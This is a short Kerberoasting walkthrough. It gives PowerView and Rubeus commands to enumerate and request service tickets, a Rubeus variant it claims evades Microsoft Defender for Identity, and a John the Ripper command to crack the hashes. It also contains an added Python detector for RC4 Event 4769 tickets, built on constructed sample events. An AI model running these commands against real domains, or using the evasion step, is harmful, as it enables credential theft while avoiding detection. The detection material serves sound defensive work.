In this section, we will discuss the Kerberoasting attack.

Enumerating Kerberoastable users using PowerView.

Get-DomainUser -SPN | select samaccountname

Now let’s enumerate the Kerberoastable users using Rubeus:

.\Rubeus.exe kerberoast /stats

We got 3 Kerberoastable accounts.

The command below will evade Microsoft Defender for Identity (MDI) and will not be detected while Kerberoasting:

.\Rubeus.exe kerberoast /user:serviceaccount /simple /rc4opsec
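
From the defender's side, each service ticket request is still recorded on the domain controller as Security Event ID 4769 when "Audit Kerberos Service Ticket Operations" is enabled. The following is an added example, not part of the original walkthrough: it flags successful RC4 (0x17) tickets issued for user-backed SPNs. The helper names, account names and event records are constructed for illustration.

```python
from collections import defaultdict

RC4_HMAC = 0x17  # Ticket Encryption Type value logged for RC4-HMAC tickets

def ev(user, service, etype, status="0x0", event_id=4769):
    """Build one constructed record using Event 4769 field names."""
    return {"EventID": event_id, "TargetUserName": user, "ServiceName": service,
            "TicketEncryptionType": etype, "Status": status}

# Constructed sample data, not taken from a real domain controller.
SAMPLE_EVENTS = [
    ev("alice@CORP.LOCAL", "serviceaccount", "0x17"),  # RC4 ticket, user SPN
    ev("alice@CORP.LOCAL", "websvc", "0x17"),          # second RC4 request
    ev("alice@CORP.LOCAL", "FS01$", "0x12"),           # AES ticket, machine account
    ev("bob@CORP.LOCAL", "krbtgt", "0x17"),            # krbtgt service, ignored
    ev("carol@CORP.LOCAL", "sqlsvc", "0x12"),          # AES ticket, ignored
    ev("dave@CORP.LOCAL", "sqlsvc", "0xffffffff", status="0x1b"),  # failed request
]

def is_rc4_user_spn_ticket(event):
    """True for a successful RC4 service ticket issued for a user-backed SPN."""
    if event.get("EventID") != 4769 or event.get("Status") != "0x0":
        return False
    service = event.get("ServiceName", "")
    # Machine-account and krbtgt keys are random, so those tickets are routine noise.
    if not service or service.endswith("$") or service.lower() == "krbtgt":
        return False
    try:
        etype = int(event.get("TicketEncryptionType", ""), 16)
    except ValueError:
        return False
    return etype == RC4_HMAC

def rc4_requests_by_account(events):
    """Map each requesting account to the user SPNs it obtained RC4 tickets for."""
    hits = defaultdict(set)
    for event in events:
        if is_rc4_user_spn_ticket(event):
            hits[event["TargetUserName"]].add(event["ServiceName"])
    return {user: sorted(services) for user, services in hits.items()}

if __name__ == "__main__":
    for user, services in rc4_requests_by_account(SAMPLE_EVENTS).items():
        print(f"{user}: RC4 service tickets for {services}")
```

Where service accounts have AES enabled, any hit from this filter is worth triage; in mixed environments, review the requester and the number of distinct services per account.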

Now let’s crack the hash with John:

john crackme.txt --wordlist=/usr/share/wordlists/rockyou.txt
